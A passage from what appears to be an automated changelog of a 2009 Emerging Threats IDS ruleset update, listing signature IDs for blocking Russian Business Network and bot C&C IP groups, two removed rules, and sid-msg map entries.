BLOCKING (293) (emerging-rbn-BLOCK.rules) 2407585 - ET RBN Known Russian Business Network IP UDP - BLOCKING (293) (emerging-rbn-BLOCK.rules) 2407586 - ET RBN Known Russian Business Network IP TCP - BLOCKING (294) (emerging-rbn-BLOCK.rules) 2407587 - ET RBN Known Russian Business Network IP UDP - BLOCKING (294) (emerging-rbn-BLOCK.rules) 2407588 - ET RBN Known Russian Business Network IP TCP - BLOCKING (295) (emerging-rbn-BLOCK.rules) 2407589 - ET RBN Known Russian Business Network IP UDP - BLOCKING (295) (emerging-rbn-BLOCK.rules) 2407590 - ET RBN Known Russian Business Network IP TCP - BLOCKING (296) (emerging-rbn-BLOCK.rules) 2407591 - ET RBN Known Russian Business Network IP UDP - BLOCKING (296) (emerging-rbn-BLOCK.rules) 2407592 - ET RBN Known Russian Business Network IP TCP - BLOCKING (297) (emerging-rbn-BLOCK.rules) 2407593 - ET RBN Known Russian Business Network IP UDP - BLOCKING (297) (emerging-rbn-BLOCK.rules) 2407594 - ET RBN Known Russian Business Network IP TCP - BLOCKING (298) (emerging-rbn-BLOCK.rules) 2407595 - ET RBN Known Russian Business Network IP UDP - BLOCKING (298) (emerging-rbn-BLOCK.rules) 2407596 - ET RBN Known Russian Business Network IP TCP - BLOCKING (299) (emerging-rbn-BLOCK.rules) 2407597 - ET RBN Known Russian Business Network IP UDP - BLOCKING (299) (emerging-rbn-BLOCK.rules) 2407598 - ET RBN Known Russian Business Network IP TCP - BLOCKING (300) (emerging-rbn-BLOCK.rules) 2407599 - ET RBN Known Russian Business Network IP UDP - BLOCKING (300) (emerging-rbn-BLOCK.rules) 2407600 - ET RBN Known Russian Business Network IP TCP - BLOCKING (301) (emerging-rbn-BLOCK.rules) 2407601 - ET RBN Known Russian Business Network IP UDP - BLOCKING (301) (emerging-rbn-BLOCK.rules) 2407602 - ET RBN Known Russian Business Network IP TCP - BLOCKING (302) (emerging-rbn-BLOCK.rules) 2407603 - ET RBN Known Russian Business Network IP UDP - BLOCKING (302) (emerging-rbn-BLOCK.rules) 2407604 - ET RBN Known Russian Business Network IP TCP - BLOCKING (303) (emerging-rbn-BLOCK.rules) 2407605 - ET RBN Known Russian Business Network IP UDP - BLOCKING (303) (emerging-rbn-BLOCK.rules) 2407606 - ET RBN Known Russian Business Network IP TCP - BLOCKING (304) (emerging-rbn-BLOCK.rules) 2407607 - ET RBN Known Russian Business Network IP UDP - BLOCKING (304) (emerging-rbn-BLOCK.rules) 2407608 - ET RBN Known Russian Business Network IP TCP - BLOCKING (305) (emerging-rbn-BLOCK.rules) 2407609 - ET RBN Known Russian Business Network IP UDP - BLOCKING (305) (emerging-rbn-BLOCK.rules) 2407610 - ET RBN Known Russian Business Network IP TCP - BLOCKING (306) (emerging-rbn-BLOCK.rules) 2407611 - ET RBN Known Russian Business Network IP UDP - BLOCKING (306) (emerging-rbn-BLOCK.rules) 2407612 - ET RBN Known Russian Business Network IP TCP - BLOCKING (307) (emerging-rbn-BLOCK.rules) 2407613 - ET RBN Known Russian Business Network IP UDP - BLOCKING (307) (emerging-rbn-BLOCK.rules) 2407614 - ET RBN Known Russian Business Network IP TCP - BLOCKING (308) (emerging-rbn-BLOCK.rules) 2407615 - ET RBN Known Russian Business Network IP UDP - BLOCKING (308) (emerging-rbn-BLOCK.rules) 2407616 - ET RBN Known Russian Business Network IP TCP - BLOCKING (309) (emerging-rbn-BLOCK.rules) 2407617 - ET RBN Known Russian Business Network IP UDP - BLOCKING (309) (emerging-rbn-BLOCK.rules) 2407618 - ET RBN Known Russian Business Network IP TCP - BLOCKING (310) (emerging-rbn-BLOCK.rules) 2407619 - ET RBN Known Russian Business Network IP UDP - BLOCKING (310) (emerging-rbn-BLOCK.rules) 2407620 - ET RBN Known Russian Business Network IP TCP - BLOCKING (311) (emerging-rbn-BLOCK.rules) 2407621 - ET RBN Known Russian Business Network IP UDP - BLOCKING (311) (emerging-rbn-BLOCK.rules) 2407622 - ET RBN Known Russian Business Network IP TCP - BLOCKING (312) (emerging-rbn-BLOCK.rules) 2407623 - ET RBN Known Russian Business Network IP UDP - BLOCKING (312) (emerging-rbn-BLOCK.rules) 2407624 - ET RBN Known Russian Business Network IP TCP - BLOCKING (313) (emerging-rbn-BLOCK.rules) 2407625 - ET RBN Known Russian Business Network IP UDP - BLOCKING (313) (emerging-rbn-BLOCK.rules) 2407626 - ET RBN Known Russian Business Network IP TCP - BLOCKING (314) (emerging-rbn-BLOCK.rules) 2407627 - ET RBN Known Russian Business Network IP UDP - BLOCKING (314) (emerging-rbn-BLOCK.rules) 2407628 - ET RBN Known Russian Business Network IP TCP - BLOCKING (315) (emerging-rbn-BLOCK.rules) 2407629 - ET RBN Known Russian Business Network IP UDP - BLOCKING (315) (emerging-rbn-BLOCK.rules) 2407630 - ET RBN Known Russian Business Network IP TCP - BLOCKING (316) (emerging-rbn-BLOCK.rules) 2407631 - ET RBN Known Russian Business Network IP UDP - BLOCKING (316) (emerging-rbn-BLOCK.rules) 2407632 - ET RBN Known Russian Business Network IP TCP - BLOCKING (317) (emerging-rbn-BLOCK.rules) 2407633 - ET RBN Known Russian Business Network IP UDP - BLOCKING (317) (emerging-rbn-BLOCK.rules) 2407634 - ET RBN Known Russian Business Network IP TCP - BLOCKING (318) (emerging-rbn-BLOCK.rules) 2407635 - ET RBN Known Russian Business Network IP UDP - BLOCKING (318) (emerging-rbn-BLOCK.rules) 2407636 - ET RBN Known Russian Business Network IP TCP - BLOCKING (319) (emerging-rbn-BLOCK.rules) 2407637 - ET RBN Known Russian Business Network IP UDP - BLOCKING (319) (emerging-rbn-BLOCK.rules) 2407638 - ET RBN Known Russian Business Network IP TCP - BLOCKING (320) (emerging-rbn-BLOCK.rules) 2407639 - ET RBN Known Russian Business Network IP UDP - BLOCKING (320) (emerging-rbn-BLOCK.rules) 2407640 - ET RBN Known Russian Business Network IP TCP - BLOCKING (321) (emerging-rbn-BLOCK.rules) 2407641 - ET RBN Known Russian Business Network IP UDP - BLOCKING (321) (emerging-rbn-BLOCK.rules) 2407642 - ET RBN Known Russian Business Network IP TCP - BLOCKING (322) (emerging-rbn-BLOCK.rules) 2407643 - ET RBN Known Russian Business Network IP UDP - BLOCKING (322) (emerging-rbn-BLOCK.rules) 2407644 - ET RBN Known Russian Business Network IP TCP - BLOCKING (323) (emerging-rbn-BLOCK.rules) 2407645 - ET RBN Known Russian Business Network IP UDP - BLOCKING (323) (emerging-rbn-BLOCK.rules) 2407646 - ET RBN Known Russian Business Network IP TCP - BLOCKING (324) (emerging-rbn-BLOCK.rules) 2407647 - ET RBN Known Russian Business Network IP UDP - BLOCKING (324) (emerging-rbn-BLOCK.rules) 2407648 - ET RBN Known Russian Business Network IP TCP - BLOCKING (325) (emerging-rbn-BLOCK.rules) 2407649 - ET RBN Known Russian Business Network IP UDP - BLOCKING (325) (emerging-rbn-BLOCK.rules) 2407650 - ET RBN Known Russian Business Network IP TCP - BLOCKING (326) (emerging-rbn-BLOCK.rules) 2407651 - ET RBN Known Russian Business Network IP UDP - BLOCKING (326) (emerging-rbn-BLOCK.rules) 2407652 - ET RBN Known Russian Business Network IP TCP - BLOCKING (327) (emerging-rbn-BLOCK.rules) 2407653 - ET RBN Known Russian Business Network IP UDP - BLOCKING (327) (emerging-rbn-BLOCK.rules) 2407654 - ET RBN Known Russian Business Network IP TCP - BLOCKING (328) (emerging-rbn-BLOCK.rules) 2407655 - ET RBN Known Russian Business Network IP UDP - BLOCKING (328) (emerging-rbn-BLOCK.rules) 2407656 - ET RBN Known Russian Business Network IP TCP - BLOCKING (329) (emerging-rbn-BLOCK.rules) 2407657 - ET RBN Known Russian Business Network IP UDP - BLOCKING (329) (emerging-rbn-BLOCK.rules) 2407658 - ET RBN Known Russian Business Network IP TCP - BLOCKING (330) (emerging-rbn-BLOCK.rules) 2407659 - ET RBN Known Russian Business Network IP UDP - BLOCKING (330) (emerging-rbn-BLOCK.rules) 2407660 - ET RBN Known Russian Business Network IP TCP - BLOCKING (331) (emerging-rbn-BLOCK.rules) 2407661 - ET RBN Known Russian Business Network IP UDP - BLOCKING (331) (emerging-rbn-BLOCK.rules) 2407662 - ET RBN Known Russian Business Network IP TCP - BLOCKING (332) (emerging-rbn-BLOCK.rules) 2407663 - ET RBN Known Russian Business Network IP UDP - BLOCKING (332) (emerging-rbn-BLOCK.rules) 2407664 - ET RBN Known Russian Business Network IP TCP - BLOCKING (333) (emerging-rbn-BLOCK.rules) 2407665 - ET RBN Known Russian Business Network IP UDP - BLOCKING (333) (emerging-rbn-BLOCK.rules) 2407666 - ET RBN Known Russian Business Network IP TCP - BLOCKING (334) (emerging-rbn-BLOCK.rules) 2407667 - ET RBN Known Russian Business Network IP UDP - BLOCKING (334) (emerging-rbn-BLOCK.rules) 2407668 - ET RBN Known Russian Business Network IP TCP - BLOCKING (335) (emerging-rbn-BLOCK.rules) 2407669 - ET RBN Known Russian Business Network IP UDP - BLOCKING (335) (emerging-rbn-BLOCK.rules) 2407670 - ET RBN Known Russian Business Network IP TCP - BLOCKING (336) (emerging-rbn-BLOCK.rules) 2407671 - ET RBN Known Russian Business Network IP UDP - BLOCKING (336) (emerging-rbn-BLOCK.rules) 2407672 - ET RBN Known Russian Business Network IP TCP - BLOCKING (337) (emerging-rbn-BLOCK.rules) 2407673 - ET RBN Known Russian Business Network IP UDP - BLOCKING (337) (emerging-rbn-BLOCK.rules) 2407674 - ET RBN Known Russian Business Network IP TCP - BLOCKING (338) (emerging-rbn-BLOCK.rules) 2407675 - ET RBN Known Russian Business Network IP UDP - BLOCKING (338) (emerging-rbn-BLOCK.rules) 2407676 - ET RBN Known Russian Business Network IP TCP - BLOCKING (339) (emerging-rbn-BLOCK.rules) 2407677 - ET RBN Known Russian Business Network IP UDP - BLOCKING (339) (emerging-rbn-BLOCK.rules) 2407678 - ET RBN Known Russian Business Network IP TCP - BLOCKING (340) (emerging-rbn-BLOCK.rules) 2407679 - ET RBN Known Russian Business Network IP UDP - BLOCKING (340) (emerging-rbn-BLOCK.rules) 2407680 - ET RBN Known Russian Business Network IP TCP - BLOCKING (341) (emerging-rbn-BLOCK.rules) 2407681 - ET RBN Known Russian Business Network IP UDP - BLOCKING (341) (emerging-rbn-BLOCK.rules) 2407682 - ET RBN Known Russian Business Network IP TCP - BLOCKING (342) (emerging-rbn-BLOCK.rules) 2407683 - ET RBN Known Russian Business Network IP UDP - BLOCKING (342) (emerging-rbn-BLOCK.rules) 2407684 - ET RBN Known Russian Business Network IP TCP - BLOCKING (343) (emerging-rbn-BLOCK.rules) 2407685 - ET RBN Known Russian Business Network IP UDP - BLOCKING (343) (emerging-rbn-BLOCK.rules) 2407686 - ET RBN Known Russian Business Network IP TCP - BLOCKING (344) (emerging-rbn-BLOCK.rules) 2407687 - ET RBN Known Russian Business Network IP UDP - BLOCKING (344) (emerging-rbn-BLOCK.rules) 2407688 - ET RBN Known Russian Business Network IP TCP - BLOCKING (345) (emerging-rbn-BLOCK.rules) 2407689 - ET RBN Known Russian Business Network IP UDP - BLOCKING (345) (emerging-rbn-BLOCK.rules) 2407690 - ET RBN Known Russian Business Network IP TCP - BLOCKING (346) (emerging-rbn-BLOCK.rules) 2407691 - ET RBN Known Russian Business Network IP UDP - BLOCKING (346) (emerging-rbn-BLOCK.rules) 2407692 - ET RBN Known Russian Business Network IP TCP - BLOCKING (347) (emerging-rbn-BLOCK.rules) 2407693 - ET RBN Known Russian Business Network IP UDP - BLOCKING (347) (emerging-rbn-BLOCK.rules) 2407694 - ET RBN Known Russian Business Network IP TCP - BLOCKING (348) (emerging-rbn-BLOCK.rules) 2407695 - ET RBN Known Russian Business Network IP UDP - BLOCKING (348) (emerging-rbn-BLOCK.rules) 2407696 - ET RBN Known Russian Business Network IP TCP - BLOCKING (349) (emerging-rbn-BLOCK.rules) 2407697 - ET RBN Known Russian Business Network IP UDP - BLOCKING (349) (emerging-rbn-BLOCK.rules) 2407698 - ET RBN Known Russian Business Network IP TCP - BLOCKING (350) (emerging-rbn-BLOCK.rules) 2407699 - ET RBN Known Russian Business Network IP UDP - BLOCKING (350) (emerging-rbn-BLOCK.rules) 2407700 - ET RBN Known Russian Business Network IP TCP - BLOCKING (351) (emerging-rbn-BLOCK.rules) 2407701 - ET RBN Known Russian Business Network IP UDP - BLOCKING (351) (emerging-rbn-BLOCK.rules) 2407702 - ET RBN Known Russian Business Network IP TCP - BLOCKING (352) (emerging-rbn-BLOCK.rules) 2407703 - ET RBN Known Russian Business Network IP UDP - BLOCKING (352) (emerging-rbn-BLOCK.rules) 2407704 - ET RBN Known Russian Business Network IP TCP - BLOCKING (353) (emerging-rbn-BLOCK.rules) 2407705 - ET RBN Known Russian Business Network IP UDP - BLOCKING (353) (emerging-rbn-BLOCK.rules) 2407706 - ET RBN Known Russian Business Network IP TCP - BLOCKING (354) (emerging-rbn-BLOCK.rules) 2407707 - ET RBN Known Russian Business Network IP UDP - BLOCKING (354) (emerging-rbn-BLOCK.rules) 2407708 - ET RBN Known Russian Business Network IP TCP - BLOCKING (355) (emerging-rbn-BLOCK.rules) 2407709 - ET RBN Known Russian Business Network IP UDP - BLOCKING (355) (emerging-rbn-BLOCK.rules) 2407710 - ET RBN Known Russian Business Network IP TCP - BLOCKING (356) (emerging-rbn-BLOCK.rules) 2407711 - ET RBN Known Russian Business Network IP UDP - BLOCKING (356) (emerging-rbn-BLOCK.rules) 2407712 - ET RBN Known Russian Business Network IP TCP - BLOCKING (357) (emerging-rbn-BLOCK.rules) 2407713 - ET RBN Known Russian Business Network IP UDP - BLOCKING (357) (emerging-rbn-BLOCK.rules) 2407714 - ET RBN Known Russian Business Network IP TCP - BLOCKING (358) (emerging-rbn-BLOCK.rules) 2407715 - ET RBN Known Russian Business Network IP UDP - BLOCKING (358) (emerging-rbn-BLOCK.rules) 2407716 - ET RBN Known Russian Business Network IP TCP - BLOCKING (359) (emerging-rbn-BLOCK.rules) 2407717 - ET RBN Known Russian Business Network IP UDP - BLOCKING (359) (emerging-rbn-BLOCK.rules) 2407718 - ET RBN Known Russian Business Network IP TCP - BLOCKING (360) (emerging-rbn-BLOCK.rules) 2407719 - ET RBN Known Russian Business Network IP UDP - BLOCKING (360) (emerging-rbn-BLOCK.rules) 2407720 - ET RBN Known Russian Business Network IP TCP - BLOCKING (361) (emerging-rbn-BLOCK.rules) 2407721 - ET RBN Known Russian Business Network IP UDP - BLOCKING (361) (emerging-rbn-BLOCK.rules) 2407722 - ET RBN Known Russian Business Network IP TCP - BLOCKING (362) (emerging-rbn-BLOCK.rules) 2407723 - ET RBN Known Russian Business Network IP UDP - BLOCKING (362) (emerging-rbn-BLOCK.rules) 2407724 - ET RBN Known Russian Business Network IP TCP - BLOCKING (363) (emerging-rbn-BLOCK.rules) 2407725 - ET RBN Known Russian Business Network IP UDP - BLOCKING (363) (emerging-rbn-BLOCK.rules) 2407726 - ET RBN Known Russian Business Network IP TCP - BLOCKING (364) (emerging-rbn-BLOCK.rules) 2407727 - ET RBN Known Russian Business Network IP UDP - BLOCKING (364) (emerging-rbn-BLOCK.rules) 2407728 - ET RBN Known Russian Business Network IP TCP - BLOCKING (365) (emerging-rbn-BLOCK.rules) 2407729 - ET RBN Known Russian Business Network IP UDP - BLOCKING (365) (emerging-rbn-BLOCK.rules) [---] Removed rules: [---] 2003634 - ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan (emerging-web_sql_injection.rules) 2009695 - ET CURRENT_EVENTS ISC BIND9 Update DoS (emerging.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 141 # Updated 2009-08-12 15:21:06 -> Added to emerging-rbn.rules (2): # VERSION 141 # Updated 2009-08-12 15:21:06 -> Added to emerging-scan.rules (2): #Seen being used for vuln scanning. # The original script it's modified from is legitimate, so there may be some falses -> Added to emerging-sid-msg.map (94): 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org 2406730 || ET RBN Known Russian Business Network IP TCP (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406731 || ET RBN Known Russian Business Network IP UDP (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406732 || ET RBN Known Russian Business Network IP TCP (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406733 || ET RBN Known Russian Business Network IP UDP (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406734 || ET RBN Known Russian Business Network IP TCP (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406735 || ET RBN Known Russian Business Network IP UDP (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406736 || ET RBN Known Russian Business Network IP TCP (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406737 || ET RBN Known Russian Business Network IP UDP (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406738 || ET RBN Known Russian Business Network IP TCP (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406739 || ET RBN Known Russian Business Network IP UDP (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406740 || ET RBN Known Russian Business Network IP TCP (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406741 || ET RBN Known Russian Business Network IP UDP (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406742 || ET RBN Known Russian Business Network IP TCP (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406743 || ET RBN Known Russian Business Network IP UDP (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406744 || ET RBN Known Russian Business Network IP TCP (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406745 || ET RBN Known Russian Business Network IP UDP (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406746 || ET RBN Known Russian Business Network IP TCP (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406747 || ET RBN Known Russian Business Network IP UDP (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406748 || ET RBN Known Russian Business Network IP TCP (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406749 || ET RBN Known Russian Business Network IP UDP (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406750 || ET RBN Known Russian Business Network IP TCP (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406751 || ET RBN Known Russian Business Network IP UDP (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406752 || ET RBN Known Russian Business Network IP TCP (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406753 || ET RBN Known Russian Business Network IP UDP (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406754 || ET RBN Known Russian Business Network IP TCP (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406755 || ET RBN Known Russian Business Network IP UDP (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406756 || ET RBN Known Russian Business Network IP TCP (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406757 || ET RBN Known Russian Business Network IP UDP (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406758 || ET RBN Known Russian Business Network IP TCP (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406759 || ET RBN Known Russian Business Network IP UDP (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406760 || ET RBN Known Russian Business Network IP TCP (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406761 || ET RBN Known Russian Business Network IP UDP (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406762 || ET RBN Known Russian Business Network IP TCP (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406763 || ET RBN Known Russian Business Network IP UDP (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406764 || ET RBN Known Russian Business Network IP TCP (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406765 || ET RBN Known Russian Business Network IP UDP (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406766 || ET RBN Known Russian Business Network IP TCP (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406767 || ET RBN Known Russian Business Network IP UDP (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406768 || ET RBN Known Russian Business Network IP TCP (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406769 || ET RBN Known Russian Business Network IP UDP (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406770 || ET RBN Known Russian Business Network IP TCP (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406771 || ET RBN Known Russian Business Network IP UDP (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406772 || ET RBN Known Russian Business Network IP TCP (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406773 || ET RBN Known Russian Business Network IP UDP (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406774 || ET RBN Known Russian Business Network IP TCP (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406775 || ET RBN Known Russian Business Network IP UDP (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407730 || ET RBN Known Russian Business Network IP TCP - BLOCKING (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407731 || ET RBN Known Russian Business Network IP UDP - BLOCKING (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407732 || ET RBN Known Russian Business Network IP TCP - BLOCKING (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407733 || ET RBN Known Russian Business Network IP UDP - BLOCKING (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407734 || ET RBN Known Russian Business Network IP TCP - BLOCKING (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407735 || ET RBN Known Russian Business Network IP UDP - BLOCKING (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407736 || ET RBN Known Russian Business Network IP TCP - BLOCKING (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407737 || ET RBN Known Russian Business Network IP UDP - BLOCKING (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407738 || ET RBN Known Russian Business Network IP TCP - BLOCKING (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407739 || ET RBN Known Russian Business Network IP UDP - BLOCKING (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407740 || ET RBN Known Russian Business Network IP TCP - BLOCKING (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407741 || ET RBN Known Russian Business Network IP UDP - BLOCKING (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407742 || ET RBN Known Russian Business Network IP TCP - BLOCKING (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407743 || ET RBN Known Russian Business Network IP UDP - BLOCKING (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407744 || ET RBN Known Russian Business Network IP TCP - BLOCKING (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407745 || ET RBN Known Russian Business Network IP UDP - BLOCKING (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407746 || ET RBN Known Russian Business Network IP TCP - BLOCKING (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407747 || ET RBN Known Russian Business Network IP UDP - BLOCKING (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407748 || ET RBN Known Russian Business Network IP TCP - BLOCKING (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407749 || ET RBN Known Russian Business Network IP UDP - BLOCKING (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407750 || ET RBN Known Russian Business Network IP TCP - BLOCKING (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407751 || ET RBN Known Russian Business Network IP UDP - BLOCKING (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407752 || ET RBN Known Russian Business Network IP TCP - BLOCKING (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407753 || ET RBN Known Russian Business Network IP UDP - BLOCKING (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407754 || ET RBN Known Russian Business Network IP TCP - BLOCKING (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407755 || ET RBN Known Russian Business Network IP UDP - BLOCKING (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407756 || ET RBN Known Russian Business Network IP TCP - BLOCKING (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407757 || ET RBN Known Russian Business Network IP UDP - BLOCKING (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407758 || ET RBN Known Russian Business Network IP TCP - BLOCKING (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407759 || ET RBN Known Russian Business Network IP UDP - BLOCKING (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407760 || ET RBN Known Russian Business Network IP TCP - BLOCKING (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407761 || ET RBN Known Russian Business Network IP UDP - BLOCKING (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407762 || ET RBN Known Russian Business Network IP TCP - BLOCKING (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407763 || ET RBN Known Russian Business Network IP UDP - BLOCKING (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407764 || ET RBN Known Russian Business Network IP TCP - BLOCKING (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407765 || ET RBN Known Russian Business Network IP UDP - BLOCKING (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407766 || ET RBN Known Russian Business Network IP TCP - BLOCKING (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407767 || ET RBN Known Russian Business Network IP UDP - BLOCKING (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407768 || ET RBN Known Russian Business Network IP TCP - BLOCKING (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407769 || ET RBN Known Russian Business Network IP UDP - BLOCKING (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407770 || ET RBN Known Russian Business Network IP TCP - BLOCKING (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407771 || ET RBN Known Russian Business Network IP UDP - BLOCKING (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407772 || ET RBN Known Russian Business Network IP TCP - BLOCKING (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407773 || ET RBN Known Russian Business Network IP UDP - BLOCKING (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407774 || ET RBN Known Russian Business Network IP TCP - BLOCKING (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407775 || ET RBN Known Russian Business Network IP UDP - BLOCKING (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (94): 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org 2406730 || ET RBN Known Russian Business Network IP TCP (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406731 || ET RBN Known Russian Business Network IP UDP (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406732 || ET RBN Known Russian Business Network IP TCP (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406733 || ET RBN Known Russian Business Network IP UDP (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406734 || ET RBN Known Russian Business Network IP TCP (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406735 || ET RBN Known Russian Business Network IP UDP (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406736 || ET RBN Known Russian Business Network IP TCP (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406737 || ET RBN Known Russian Business Network IP UDP (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406738 || ET RBN Known Russian Business Network IP TCP (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406739 || ET RBN Known Russian Business Network IP UDP (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406740 || ET RBN Known Russian Business Network IP TCP (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406741 || ET RBN Known Russian Business Network IP UDP (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406742 || ET 